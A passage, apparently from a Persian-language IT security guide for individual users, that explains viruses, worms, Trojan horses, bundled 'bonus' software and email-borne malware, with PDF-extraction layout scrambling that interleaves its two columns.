‫ﮔﺬﺷﺘﻪ ﺍﺯ ﻭﻇﻴﻔﺔ ﻗﺎﻧﻮﻧﻲ ﻣﺴﺌﻮﻟﻴﻦ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺧﺪﺷـﻪﺩﺍﺭ‬
‫ﺷﺪﻥ ﺣﻘﻮﻕ ﻣﺎﻟﻜﻴﺖ ﺳﺎﺯﻧﺪﺓ ﻣﺤﺼﻮﻝ‪ ،‬ﺩﻭ ﻧﻜﺘﻪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺴﺮﻭﻗﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ‪.‬‬
‫ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﺍﻳﻦ ﺩﻭ ﻣﻮﺭﺩ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺴﺮﻭﻗﻪ ﭼﻨﺪﺍﻥ ﺭﺍﻳﺞ‬
‫ﻧﻴﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﻪ ﻫﺮ ﺣﺎﻝ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻫﺮ ﺩﻭ ﺑﺎ ﻫـﻢ‬
‫ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺴﺮﻭﻗﻪ ﻗﺎﺑﻞ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﺷـﺪﻥ‬ ‫‪.۱‬‬
‫ﻧﺒﺎﺷﺪ ﻳﺎ ﺍﻧﺠﺎﻡ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺁﻧﺮﺍ ﺍﺯ ﻛﺎﺭ ﺑﻴﻨﺪﺍﺯﺩ‪.‬‬
‫ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﺑﺮﺧـﻲ ﺍﺯ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻫـﺎﻱ ﻣـﺴﺮﻭﻗﻪ ﺣـﺎﻭﻱ‬ ‫‪.۲‬‬
‫ﻛﺎﺭﻛﺮﺩﻫــﺎﻳﻲ ﺑﺎﺷــﻨﺪ ﻛــﻪ ﺍﻧﺘﻈــﺎﺭ ﺁﻧﻬــﺎ ﺭﺍ ﻧﺪﺍﺭﻳــﺪ‪ .‬ﺍﻳــﻦ‬
‫ﻛﺎﺭﻛﺮﺩﻫــﺎ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺷــﺎﻣﻞ ﺩﺭﺑﻬــﺎﻱ ﻣﺨﻔــﻲ‪،‬‬
‫ﺛﺒﺖﻛﻨﻨﺪﻩﻫﺎﻱ ﺻﻔﺤﻪﻛﻠﻴﺪ‪ ،‬ﻳﺎ ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ‬
‫ﻣﺨﺮﺏ ﺑﺎﺷﻨﺪ‪.‬‬

‫‪35‬‬ ‫‪Pirated Software‬‬


‫‪٧١‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﺍﺟﺮﺍ ﺩﺭ ﻣﻲﺁﻳﺪ‪ ،‬ﻭﻳﺮﻭﺱ ﻧﻴﺰ ﺍﺟﺮﺍ ﻣـﻲ ﺷـﻮﺩ ﻭ‬


‫ﻧﺴﺨﻪﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻓﺎﻳﻠﻬﺎ ﻳـﺎ ﺩﻳـﺴﻜﻬﺎﻱ‬
‫ﺩﻳﮕﺮ ﻣﻲ ﻛﻨـﺪ ﻭ ﺑﺪﻳﻨـﺼﻮﺭﺕ ﺧـﻮﺩ ﺭﺍ ﺗﻜـﺮﺍﺭ‬
‫ﻣﻲ ﻧﻤﺎﻳﺪ‪ ،‬ﻭ ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻫﺮﻳـﻚ ﺍﺯ ﻓﺎﻳﻬـﺎ ﻳـﺎ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺁﻟﻮﺩﻩ ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ ﺍﻳﻦ ﺭﻭﻧـﺪ ﺑـﺎﺭ‬ ‫ﻓﺼﻞ ﭘﻨﺠﻢ‬
‫ﺩﻳﮕﺮ ﺗﻜﺮﺍﺭ ﻣﻲ ﮔﺮﺩﺩ‪ .‬ﻭﻳﺮﻭﺱ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ ﻛﺎﺭﻫـﺎﻱ ﺩﻳﮕـﺮﻱ ﻧﻴـﺰ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪.‬‬
‫ﻛﻠﻴﺎﺕ‬
‫ﻛﺮﻣﻬﺎ ﺍﺯ ﺍﻳﻦ ﺟﻬﺖ ﻛﻪ ﻧـﺴﺨﻪﺍﻱ ﺍﺯ ﺧـﻮﺩ ﺭﺍ‬ ‫ﻛﺮﻡ‬ ‫ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﻣﻔﻬﻮﻡ ﻭ ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻒ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ )ﻧﻈﻴﺮ‬
‫ﺗﻜﺮﺍﺭ ﻣﻲﻛﻨﻨﺪ ﻣﺸﺎﺑﻪ ﻭﻳﺮﻭﺳـﻬﺎ ﻫـﺴﺘﻨﺪ‪ ،‬ﺍﻣـﺎ‬ ‫ﺍﻳﻨﺘﺮﻧﺘﻲ‬ ‫ﻭﻳﺮﻭﺳﻬﺎ‪ ،‬ﻛﺮﻡﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ‪ ،‬ﻭ ﺗﺮﺍﻭﺍﻫـﺎ( ﻭ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻳﻲ ﻛـﻪ ﺑـﺮﺍﻱ‬
‫ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺑﻪ ﺑﺮﻧﺎﻣـﺔ ﻣﻴﺰﺑـﺎﻥ ﻧﻴـﺎﺯ ﻧﺪﺍﺭﻧـﺪ‪.‬‬ ‫ﺗﻮﺯﻳﻊ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ﻣﻮﺭﺩ ﻣﻄﺎﻟﻌﻪ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪.‬‬
‫ﻫﻤﺎﻧﻨﺪ ﻭﻳﺮﻭﺳﻬﺎ‪ ،‬ﻳﻚ ﻛﺮﻡ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻨﻬـﺎ‬
‫ﻧﺴﺨﻪﻫـﺎﻳﻲ ﺍﺯ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﺟﺎﻫـﺎﻱ ﻣﺨﺘﻠـﻒ‬ ‫ﻣﻘﺪﻣﻪ‬
‫ﺗﻜﺮﺍﺭ ﻛﻨﺪ ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ ﻋـﻼﻭﻩ ﺑـﺮ ﺁﻥ ﻋﻤﻠﻴـﺎﺕ‬ ‫‪٣٦‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ‬
‫ﺩﻳﮕﺮﻱ ﻧﻴﺰ ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪ .‬ﻛﺮﻡ ﺗﻨﻬﺎ ﺯﻣـﺎﻧﻲ ﻛـﺎﺭ‬
‫ﻣﻲ ﻛﻨﺪ ﻛﻪ ﺳﻴﺴﺘﻢ ﻗﺎﺑﻠﻴـﺖ ﭘـﺬﻳﺮﻓﺘﻦ ﻣﻨـﺎﺑﻊ‬ ‫ﻋﻼﻣﺖ ﺍﺧﺘﺼﺎﺭﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﺑـﺪﺍﻓﺰﺍﺭ‪ ٣٧‬ﺍﺳـﺖ‪ .‬ﺍﻳـﻦ‬
‫ﺧﺎﺭﺟﻲ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺍﺯ ﻃﺮﻳـﻖ ﺁﻥ ﻣﻨـﺎﺑﻊ‬ ‫ﻻ ﺑﺮﺍﻱ ﺁﺳﻴﺐ ﺭﺳﺎﻧﺪﻥ ﻳﺎ ﺧﺮﺍﺏ ﻛﺮﺩﻥ ﺳﻴﺴﺘﻢ‬ ‫ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺘﻮﺍﻧﺪ ﺑـﻪ ﺍﺟـﺮﺍﻱ ﺑﺮﻧﺎﻣـﻪ ﺑﭙـﺮﺩﺍﺯﺩ‪ .‬ﺑﺮﺧـﻲ ﺍﺯ‬ ‫ﻃﺮﺍﺣﻲ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﺷﻨﺎﺳـﺎﻳﻲ ﺑـﺪﺍﻓﺰﺍﺭﻫﺎ‪،‬‬ ‫ﺍﻭﻟﻴﻦ ﻭﻳﺮﻭﺱ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺩﺭ ﺳﺎﻝ ‪ ۱۹۸۱‬ﺷﻨﺎﺳﺎﻳﻲ ﺷـﺪ‪ .‬ﻣﻔﻬـﻮﻡ‬
‫ﻛﺮﻡ ﺭﺍ ﻧﻴﺰ ﻧﻮﻋﻲ ﻭﻳﺮﻭﺱ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻭﺭﻧﺪ‪.‬‬ ‫ﻛــﺮﻡ ﺭﺍﻳﺎﻧــﻪﺍﻱ‪ ٣٨‬ﺩﺭ ﻛﺘــﺎﺏ "‪ "Science Fiction‬ﺩﺭ ﺳــﺎﻝ‬
‫‪ ۱۹۷۵‬ﻣﻌﺮﻓﻲ ﺷﺪ ﻭ ﺍﻭﻟﻴﻦ ﻓﻌﺎﻟﻴﺖ ﻭﺍﻗﻌﻲ ﺁﻥ ﻣﺮﺑﻮﻁ ﺑـﻪ ﺍﻭﺍﻳـﻞ‬
‫ﻧﺎﻡ ﺍﻳﻦ ﻧﻮﻉ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﺯ ﺍﻓـﺴﺎﻧﺔ ﺟﻨـﮓ ﺷـﻬﺮ‬ ‫ﺍﺳﺐ ﺗﺮﺍﻭﺍ‬ ‫ﺩﻫﺔ ‪ ۱۹۸۰‬ﺍﺳﺖ‪ .‬ﺟﺎﻟﺐ ﺍﺳﺖ ﺑﺪﺍﻧﻴﺪ ﻛﻪ ﺍﻳﻦ ﻛﺮﻣﻬﺎ ﺍﻭﻟـﻴﻦ ﺑـﺎﺭ‬
‫ﺗﺮﺍﻭﺍ ﺩﺭ ﻳﻮﻧـﺎﻥ ﺑﺮﮔﺮﻓﺘـﻪ ﺷـﺪﻩ ﺍﺳـﺖ‪ .‬ﺩﺭ ﺁﻥ‬ ‫ﺑﺮﺍﻱ ﺍﻳﻦ ﻃﺮﺍﺣﻲ ﺷـﺪﻧﺪ ﻛـﻪ ﻋﻤﻠﻜـﺮﺩ ﻣﺜﺒـﺖ ﻭ ﻣﻔﻴـﺪ ﺩﺍﺷـﺘﻪ‬
‫ﺍﻓﺴﺎﻧﻪ‪ ،‬ﻳﻮﻧﺎﻧﻲﻫﺎ ﻳﻚ ﺍﺳﺐ ﭼﻮﺑﻲ ﺑﺰﺭﮒ ﺭﺍ ﺍﺯ‬ ‫ﺑﺎﺷﻨﺪ‪ .‬ﭘﻴـﺪﺍﻳﺶ ﺍﺳـﺒﻬﺎﻱ ﺗـﺮﺍﻭﺍﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ‪ ٣٩‬ﻫـﻢ ﺑـﻪ ﺍﻭﻟـﻴﻦ‬
‫ﺩﺭﻭﺍﺯﺓ ﺷﻬﺮ ﺑﻪ ﺩﺍﺧﻞ ﻣﻲﻓﺮﺳﺘﻨﺪ ﻭ ﻫﻨﮕﺎﻣﻴﻜﻪ‬ ‫ﺭﻭﺯﻫﺎﻱ ﺍﺷﺘﺮﺍﻙ ﺯﻣﺎﻧﻲ )ﺩﻫﺔ ‪ (۱۹۶۰‬ﺑﺎﺯ ﻣﻲﮔﺮﺩﺩ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺗﺎﺭﻳﺦ‬
‫ﺍﺳﺐ ﻭﺍﺭﺩ ﺷﻬﺮ ﻣﻲﺷﻮﺩ ﺗﻌﺪﺍﺩ ﺯﻳـﺎﺩﻱ ﺳـﺮﺑﺎﺯ‬ ‫ﻭ ﺳﺎﺑﻘﺔ ﻃﻮﻻﻧﻲ ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ‪ ،‬ﺩﺭ ﺳـﺎﻟﻬﺎﻱ ﺍﺧﻴـﺮ ﺍﺳـﺖ ﻛـﻪ‬
‫ﻳﻮﻧﺎﻧﻲ ﺍﺯ ﺁﻥ ﺧﺎﺭﺝ ﻣـﻲﺷـﻮﻧﺪ ﻭ ﺷـﻬﺮ ﺭﺍ ﺑـﻪ‬ ‫ﺗﺄﺛﻴﺮﺍﺕ ﻣﺨﺮﺏ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻋـﺎﺩﻱ ﺷـﺪﻳﺪ ﻭ ﺧﻄﺮﻧـﺎﻙ‬
‫ﺗﺼﺮﻑ ﺧﻮﺩ ﺩﺭ ﻣﻲﺁﻭﺭﻧﺪ‪ .‬ﺍﺯ ﺁﻥ ﺯﻣﺎﻥ ﺑﻪ ﺑﻌـﺪ‬ ‫ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫"ﺍﺳﺐ ﺗـﺮﺍﻭﺍ" ﺑـﻪ ﻣﻌﻨـﺎﻱ ﭼﻴـﺰﻱ ﺍﺳـﺖ ﻛـﻪ‬
‫ﺩﺭ ﺁﻏﺎﺯ ﺑﺎﻳﺪ ﻣﻌﻨﺎ ﻭ ﻣﻔﻬﻮﻡ ﺍﻳﻦ ﺍﺻﻄﻼﺣﺎﺕ ﺭﺍ ﺗﻌﺮﻳﻒ ﻛﻨﻴﻢ‪.‬‬
‫ﻇﺎﻫﺮﻱ ﻋﺎﺩﻱ ﺍﻣﺎ ﻣﺤﺘﻮﻳﺎﺗﻲ ﺧﻄﺮﻧﺎﻙ ﺩﺍﺭﺩ‪.‬‬
‫ﺩﺭ ﻣﻔﺎﻫﻴﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ‪ ،‬ﺍﺳـﺐ ﺗـﺮﺍﻭﺍ ﻣـﻲﺗﻮﺍﻧـﺪ‬ ‫ﻭﻳﺮﻭﺱ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺍﻧﺘﻬﺎﻱ ﺑﺮﻧﺎﻣـﺔ‬ ‫ﻭﻳﺮﻭﺱ‬
‫ﺧﺮﺍﺑﻴﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺑﻪ ﺑﺎﺭ ﺁﻭﺭﺩ ﻭ ﻳﺎ ﺍﻋﻤﺎﻟﻲ ﻏﻴﺮ‬ ‫ﺩﻳﮕﺮ ﻣﺘﺼﻞ ﻣـﻲﺷـﻮﺩ ﻭ ﻳـﺎ ﻭﺍﺭﺩ ﺑﺪﻧـﺔ ﻳـﻚ‬
‫ﺍﺯ ﺁﻧﭽﻪ ﻛﻪ ﻛﺎﺭﺑﺮ ﺍﻧﺘﻈﺎﺭ ﺁﻧﺮﺍ ﺩﺍﺭﺩ ﺍﻧﺠﺎﻡ ﺩﻫـﺪ‪.‬‬ ‫ﺑﺮﻧﺎﻣﺔ ﺩﻳﮕﺮ ﻣﻲﮔـﺮﺩﺩ‪ .‬ﻭﻗﺘـﻲ ﺁﻥ ﺑﺮﻧﺎﻣـﻪ ﺑـﻪ‬
‫ﺍﻳﻦ ﺍﺻﻄﻼﺡ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﺑﻪ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ‬
‫ﻻ ﺑـﺪﻭﻥ‬ ‫ﻣﺨﺮﺑﻲ ﺍﻃﻼﻕ ﻣﻲﺷـﻮﺩ ﻛـﻪ ﻣﻌﻤـﻮ ﹰ‬
‫ﺍﻃﻼﻉ ﻭ ﺍﺟﺎﺯﺓ ﻛﺎﺭﺑﺮ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻣﻲﺷـﻮﻧﺪ ﻭ‬ ‫‪36‬‬ ‫‪Malicious Software‬‬
‫‪37‬‬ ‫‪Malware‬‬
‫ﺑﻪ ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﺍﺭﺳﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ‪.‬‬ ‫‪38‬‬ ‫‪Computer Worms‬‬
‫‪39‬‬ ‫‪Computer Trojan Horses‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٧٢‬‬

‫ﺍﺭﺳﺎﻝ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬


‫ﺍﺭﺳــﺎﻝ ﻧﺎﻣــﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﻳﻜــﻲ ﺍﺯ ﺭﺍﻳﺠﺘــﺮﻳﻦ ﻋﻤﻠﻜﺮﺩﻫــﺎﻱ‬ ‫ﻧﺮﻡﺍﻓﺰﺍﺭ‬
‫ﻧﺮﻡ ﺍﻓﺰﺍﺭ ‪ bonus‬ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺳﺖ ﻛﻪ ﺑـﺪﻭﻥ‬
‫ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﻣﺨـﺮﺏ ﺍﺳـﺖ‪ .‬ﻧﺎﻣـﻪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬ ‫"‪"Bonus‬‬
‫ﺁﮔﺎﻫﻲ ﺷﻤﺎ ﺣﺎﻭﻱ ﺑﺴﺘﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ‬
‫ﺿﻤﻴﻤﻪ ﺍﻱ‪ ٤٢‬ﺷﺎﻣﻞ ﻭﻳﺮﻭﺱ ﻳﺎ ﻛﺮﻡ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﻣﺘﻦ‪ ٤٣‬ﺁﻥ ﻧﻴﺰ‬
‫ﺩﺭ ﺁﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻗـﺮﺍﺭ ﮔـﺮﻓﺘﻦ ﺑـﺴﺘﻪﻫــﺎﻱ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻃﻼﻋﺎﺕ ﺧﺎﺻـﻲ ﺗﻨﻈـﻴﻢ ﺷـﺪﻩ ﺑﺎﺷـﺪ )ﻧﻈﻴـﺮ‬
‫ﺩﻳﮕﺮ ﺩﺭ ﻳﻚ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﺗﺠﺎﺭﻱ ﻣﺮﺳﻮﻡ ﺍﺳـﺖ‪.‬‬
‫ﻫﺸﺪﺍﺭﻫﺎﻱ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺘﻲ( ﻳﺎ ﺣﺘﻲ ﻣﻲﺗﻮﺍﻧﺪ‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﮔﺮ ﻳﻚ ﻣﺮﻭﺭﮔﺮ ﻭﺏ ﻧﺼﺐ ﻛﻨﻴﺪ‬
‫ﺩﺍﺭﺍﻱ ﻳﻚ ﻗﺴﻤﺖ ﺗﺼﺎﺩﻓﻲ ﺍﺯ ﻧﺎﻣﻪﻫـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﭘﻴـﺸﻴﻦ‬
‫ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺷــﺎﻣﻞ ﺑﺮﻧﺎﻣــﺔﻫــﺎﻳﻲ ﭼــﻮﻥ‬
‫ﺷﻤﺎ ﺑﺎﺷﺪ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﻣﻮﺟﻮﺩ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺿـﻤﻴﻤﺔ ﻧﺎﻣـﻪ ﻓﺎﻳـﻞ‬
‫‪ Adobe Acrobat‬ﻳـــﺎ ﻧـــﺮﻡﺍﻓﺰﺍﺭﻫـــﺎﻱ‬
‫ﻻ ﻣﺘﻦ ﺁﻥ ﺑﻪ ﻧﺤـﻮﻱ ﺩﺭﻳﺎﻓـﺖ ﻛﻨﻨـﺪﻩ ﺭﺍ‬ ‫ﺧﻄﺮﻧﺎﻛﻲ ﺑﺎﺷﺪ‪ ،‬ﻣﻌﻤﻮ ﹰ‬
‫‪٤٤‬‬ ‫ﭼﻨﺪﺭﺳﺎﻧﻪﺍﻱ ﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﺍﻣﺮ ﺑﻪ ﺍﻳﻦ ﻋﻠﺖ ﺍﺳﺖ‬
‫ﺗﺸﻮﻳﻖ ﻣﻲﻧﻤﺎﻳﺪ ﻛﻪ ﺿﻤﻴﻤﻪ ﺭﺍ ﺑﺎﺯ ﻛﻨﺪ‪ .‬ﻓﻴﻠﺪﻫﺎﻱ ﻣﻮﺿـﻮﻉ ﻭ‬
‫ﻻ ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﻛﺎﺭﺍﻳﻲ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺍﺻـﻠﻲ‬ ‫ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻨﻈﻴﻢ ﻣﻲﺷـﻮﻧﺪ ﻛـﻪ ﻛـﺎﺭﺑﺮ ﺭﺍ‬ ‫ﻓﺮﺳﺘﻨﺪﻩ‪ ٤٥‬ﻧﻴﺰ ﻣﻌﻤﻮ ﹰ‬
‫ﻻ‬
‫ﺍﻓﺰﺍﻳﺶ ﻣﻲﻳﺎﺑﺪ ﻭ ﺭﻭﻧﺪ ﻓﻌﺎﻟﻴـﺖ ﻧﻴـﺰ ﻣﻌﻤـﻮ ﹰ‬
‫ﺗﺸﻮﻳﻖ ﻛﻨﻨﺪ ﻛﻪ ﻓﺎﻳﻞ ﺿﻤﻴﻤﻪ ﺭﺍ ﺑﺎﺯ ﻛﻨﺪ )ﻣﺜﻞ ﻛﺮﻡ ﻣﺸﻬﻮﺭﻱ ﻛـﻪ‬
‫ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺍﺳﺖ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﺗﻤﺎﻳـﻞ ﺷـﻤﺎ‬
‫ﻻ ﺑـﺮﺍﻱ‬ ‫ﻣﻮﺿﻮﻉ ﺁﻥ "‪ "I Love You‬ﺑﻮﺩ(‪ .‬ﺍﻳـﻦ ﻧـﻮﻉ ﭘﻴﺎﻣﻬـﺎ ﻣﻌﻤـﻮ ﹰ‬
‫ﺁﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺟﺎﻧﺒﻲ ﺭﺍ ﻧﺼﺐ ﻣـﻲﻛﻨـﺪ ﻳـﺎ‬
‫ﺍﻓﺮﺍﺩﻱ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﺁﺩﺭﺱ ﺁﻧﻬﺎ ﺩﺭ ﻓﻬﺮﺳﺖ ﺁﺩﺭﺳـﻬﺎ ﻳـﺎ‬
‫ﺍﻳﻨﻜﻪ ﺩﺭ ﺁﻏﺎﺯ ﻧﺼﺐ ﺁﻥ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺷـﻤﺎ ﺭﺍ ﺍﺯ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﺩﻳﮕﺮ ﺭﺍﻳﺎﻧﺔ ﺁﻟـﻮﺩﻩ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ .‬ﮔـﺎﻫﻲ ﺍﻭﻗـﺎﺕ ﻭﻗﺘـﻲ‬
‫ﺍﻧﺠــﺎﻡ ﺍﻳﻨﻜــﺎﺭ ﺁﮔــﺎﻩ ﻣــﻲﺳــﺎﺯﺩ‪ .‬ﻋﻤﻠﻜــﺮﺩ‬
‫ﭘﻴﺎﻣﻬﺎ ﺑﺮﺍﻱ ﻫﻤﺔ ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﺍﺭﺳﺎﻝ ﺷﺪ ﺑﺮﻧﺎﻣﻪ ﻣﺘﻮﻗﻒ ﻣﻲﮔـﺮﺩﺩ‪،‬‬
‫ﻻ ﻣﺘﻔــﺎﻭﺕ ﺍﺯ‬‫ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ‪ bonus‬ﻣﻌﻤــﻮ ﹰ‬
‫ﻭ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺑﺎﺯ ﻫﻢ ﻓﻌﺎﻟﻴﺖ ﺧﻮﺩ ﺭﺍ ‪ -‬ﭼـﻪ ﺍﺯ ﺭﺍﻳﺎﻧـﺔ ﺍﻭﻟﻴـﻪ ﻭ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﺻﻠﻲ ﺍﺳـﺖ ﻭ ﺍﮔـﺮ ﭼـﺎﺭﻩﺍﻱ ﺩﺍﺷـﺘﻪ‬
‫ﭼﻪ ﺍﺯ ﻣﺒﺎﺩﻱ ﺟﺪﻳﺪ ‪ -‬ﺍﺯ ﺳﺮ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺗﻮﺟﻪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ‬
‫ﺑﺎﺷﻴﺪ ﻣﺴﻠﻤﹰﺎ ﻧﺒﺎﻳﺪ ﺁﻧﻬﺎ ﺭﺍ ﻧﺼﺐ ﻛﻨﻴﺪ‪.‬‬
‫ﺍﮔﺮ ﺭﺍﻳﺎﻧﺔ ﻓﺮﺩ ﺩﻳﮕﺮﻱ ﺑﺎ ﻭﻳﺮﻭﺱ ﻳﺎ ﻛﺮﻡ ﺁﻟﻮﺩﻩ ﺷﺪﻩ ﺑﺎﺷـﺪ ﻭ ﺁﻥ‬
‫ﻭﻳﺮﻭﺱ ﺁﺩﺭﺱ ﺷﻤﺎ ﺭﺍ ﺩﺭ ﻓﻴﻠـﺪ "ﻓﺮﺳـﺘﻨﺪﻩ" ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬ ‫ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺗﺮﺍﻭﺍ‪ ،‬ﻭﻳﺮﻭﺱ ﻭ ﻛﺮﻡ ﺑﺮﺍﻱ ﻳﻚ ﺑﺮﻧﺎﻣـﻪ "ﺍﻧﺤـﺼﺎﺭﻱ"‬
‫ﺁﻟﻮﺩﻩ ﮔﺬﺍﺷﺘﻪ ﺑﺎﺷﺪ )ﺷﺎﻳﺪ ﺑﻪ ﺍﻳﻦ ﺩﻟﻴـﻞ ﻛـﻪ ﺁﺩﺭﺱ ﺷـﻤﺎ ﺭﺍ ﺩﺭ ﻣﺎﺷـﻴﻦ‬ ‫ﻧﻴﺴﺘﻨﺪ‪ .‬ﺑﻪ ﻋﺒﺎﺭﺕ ﺩﻳﮕﺮ ﻣﻬﺎﺟﻤﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺪﺍﻓﺰﺍﺭﻱ ﺑﺎ ﺑـﻴﺶ‬
